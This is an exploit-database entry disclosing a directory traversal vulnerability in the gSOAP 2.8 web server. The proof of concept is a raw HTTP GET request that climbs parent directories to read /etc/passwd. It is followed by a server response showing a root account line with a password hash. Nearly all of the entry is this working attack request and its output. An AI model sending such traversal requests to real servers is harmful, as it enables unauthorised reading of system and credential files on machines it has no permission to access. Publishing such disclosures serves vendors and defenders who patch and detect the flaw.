gSOAP 2.8 - Directory Traversal

EDB-ID:

47653

CVE:

N/A




Platform:

PHP

Date:

2019-11-13


# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap


POC
---------

GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close

root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh